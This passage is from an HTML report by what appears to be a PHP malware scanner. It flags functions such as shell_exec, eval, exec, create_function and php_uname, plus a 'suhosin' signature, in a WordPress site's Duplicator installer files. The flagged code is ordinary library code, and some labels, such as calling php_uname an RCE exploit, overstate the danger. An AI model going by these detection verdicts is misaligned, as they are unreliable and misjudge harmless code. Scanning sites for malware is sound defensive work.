#007700">]&nbsp;&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$copy</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;++</span><span style="color: #0000BB">$yi</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$edits</span><span style="color: #007700">[]&nbsp;=&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$delete</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;}&nbsp;</span><span style="color: #0000BB">$add&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$add</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">++];&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_108").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-snapshots/20190731_likoholding_bc188927d689865dbba9a0ccab37bb40_20190731190148_installer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_109" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/'</span><span style="color: #007700">.</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">INSTALLER_DIR_NAME</span><span style="color: #007700">.</span><span style="color: #DD0000">'/lib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$snaplib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">.</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;if(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$local_lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$unzip_command&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$unzip_filepath</span><span style="color: #DD0000">&nbsp;-q&nbsp;</span><span style="color: #0000BB">$archive_filepath</span><span style="color: #DD0000">&nbsp;snaplib/*&nbsp;2&gt;&amp;1"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">log</span><span style="color: #007700">(</span><span style="color: #DD0000">"Executing&nbsp;</span><span style="color: #0000BB">$unzip_command</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">,</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">rename</span><span style="color: #007700">(</span><span style="color: #0000BB">$local_lib_directory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_109").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/ctrls/ctrl.s1.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_110" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ERR_SHELLEXEC_ZIPOPEN</span><span style="color: #007700">.</span><span style="color: #DD0000">":&nbsp;</span><span style="color: #0000BB">$stderr</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$zip_err_msg&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"&lt;br/&gt;&lt;br/&gt;&lt;b&gt;To&nbsp;resolve&nbsp;error&nbsp;see&nbsp;&lt;a&nbsp;href='https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q'&nbsp;target='_blank'&gt;https://snapcreek.com/duplicator/docs/faqs-tech/#faq-installer-130-q&lt;/a&gt;&lt;/b&gt;"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">error</span><span style="color: #007700">(</span><span style="color: #0000BB">$zip_err_msg</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"&lt;&lt;&lt;&nbsp;Shell-Exec&nbsp;Unzip&nbsp;Complete."</span><span style="color: #007700">);&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'ziparchive'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">DUPX_Log</span><span style="color: #007700">::</span><span style="color: #0000BB">info</span><span style="color: #007700">(</span><span style="color: #DD0000">"\n\nSTART&nbsp;ZIP&nbsp;FILE&nbsp;EXTRACTION&nbsp;STANDARD&nbsp;&gt;&gt;&gt;&nbsp;"</span><span style="color: #007700">);&nbsp;if&nbsp;(!class...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_110").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/views/view.s1.base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 59.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_111" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_111").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/assets/inc.libs.js.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 527.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_112" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'('</span><span style="color: #007700">+</span><span style="color: #0000BB">text</span><span style="color: #007700">+</span><span style="color: #DD0000">')'</span><span style="color: #007700">);return&nbsp;</span><span style="color: #0000BB">typeof&nbsp;filter</span><span style="color: #007700">===</span><span style="color: #DD0000">'function'</span><span style="color: #007700">?</span><span style="color: #0000BB">walk</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">,</span><span style="color: #0000BB">j</span><span style="color: #007700">):</span><span style="color: #0000BB">j</span><span style="color: #007700">;}<br />throw&nbsp;new&nbsp;</span><span style="color: #0000BB">SyntaxError</span><span style="color: #007700">(</span><span style="color: #DD0000">'parseJSON'</span><span style="color: #007700">);}};}();}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br /></span><span style="color: #FF8000">/**<br />&nbsp;*&nbsp;password_strength_plugin.js<br />&nbsp;*&nbsp;Copyright&nbsp;(c)&nbsp;20010&nbsp;myPocket&nbsp;technologies&nbsp;(www.mypocket-technologies.com)<br />&nbsp;*&nbsp;@author&nbsp;Darren&nbsp;Mason&nbsp;(djmason9@gmail.com)<br />&nbsp;*&nbsp;@date&nbsp;3/13/2009<br />&nbsp;*&nbsp;@projectDescription&nbsp;Password&nbsp;Strength&nbsp;Meter&nbsp;is&nbsp;a&nbsp;jQuery&nbsp;plug-in&nbsp;provide&nbsp;you&nbsp;smart&nbsp;algorithm&nbsp;to&nbsp;detect&nbsp;a&nbsp;password&nbsp;strength.&nbsp;<br />&nbsp;*&nbsp;Based&nbsp;on&nbsp;Firas&nbsp;Kassem&nbsp;orginal&nbsp;plugin&nbsp;-&nbsp;phiras.wordpress.com/20...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)))if(</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]){if(</span><span style="color: #0000BB">9</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">){if(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">),!</span><span style="color: #0000BB">h</span><span style="color: #007700">||!</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">parentNode</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">;if(</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else&nbsp;if(</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">&amp;&amp;(</span><span style="color: #0000BB">h</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">ownerDocument</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">))&amp;&amp;</span><span style="color: #0000BB">t</span><span style="color: #007700">(</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">h</span><span style="color: #007700">)&amp;&amp;</span><span style="color: #0000BB">h</span><span style="color: #007700">.</span><span style="color: #0000BB">id</span><span style="color: #007700">===</span><span style="color: #0000BB">j</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">d</span><span style="color: #007700">.</span><span style="color: #0000BB">push</span><span style="color: #007700">(</span><span style="color: #0000BB">h</span><span style="color: #007700">),</span><span style="color: #0000BB">d</span><span style="color: #007700">}else{if(</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByTagName</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">;if((</span><span style="color: #0000BB">j</span><span style="color: #007700">=</span><span style="color: #0000BB">f</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&amp;&amp;</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">)return&nbsp;</span><span style="color: #0000BB">H</span><span style="color: #007700">.</span><span style="color: #0000BB">apply</span><span style="color: #007700">(</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementsByClassName</span><span style="color: #007700">(</span><span style="color: #0000BB">j</span><span style="color: #007700">)),</span><span style="color: #0000BB">d</span><span style="color: #007700">}if(</span><span style="color: #0000BB">c</span><span style="color: #007700">.</span><span style="color: #0000BB">qsa</span><span style="color: #007700">&amp;&amp;(!</span><span style="color: #0000BB">q</span><span style="color: #007700">||!</span><span style="color: #0000BB">q</span><span style="color: #007700">.</span><span style="color: #0000BB">test</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">))){if(</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">u</span><span style="color: #007700">,</span><span style="color: #0000BB">w</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">x</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">!==</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">===</span><span style="color: #0000BB">k</span><span style="color: #007700">&amp;&amp;</span><span style="color: #DD0000">"object"</span><span style="color: #007700">!==</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">nodeName</span><span style="color: #007700">.</span><span style="color: #0000BB">toLowerCase</span><span style="color: #007700">()){</span><span style="color: #0000BB">o</span><span style="color: #007700">=</span><span style="color: #0000BB">g</span><span style="color: #007700">(</span><span style="color: #0000BB">a</span><span style="color: #007700">),(</span><span style="color: #0000BB">r</span><span style="color: #007700">=</span><span style="color: #0000BB">b</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">"id"</span><span style="color: #007700">))?</span><span style="color: #0000BB">s</span><span style="color: #007700">=</span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">replace</span><span style="color: #007700">(</span><span style="color: #0000BB">bb</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">a</span><span style="color: #007700">,</span><span style="color: #0000BB">b</span><span style="color: #007700">,</span><span style="color: #0000BB">c</span><span style="color: #007700">,</span><span style="color: #0000BB">d</span><span style="color: #007700">,</span><span style="color: #0000BB">e</span><span style="color: #007700">,</span><span style="color: #0000BB">f</span><span style="color: #007700">,</span><span style="color: #0000BB">g</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_112").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_113" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_113").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/classes/Crypt/Base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 98.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_114" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(</span><span style="color: #DD0000">'m'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">,&nbsp;(bool)(</span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #DD0000">'whirlpool'</span><span style="color: #007700">,&nbsp;</span><span 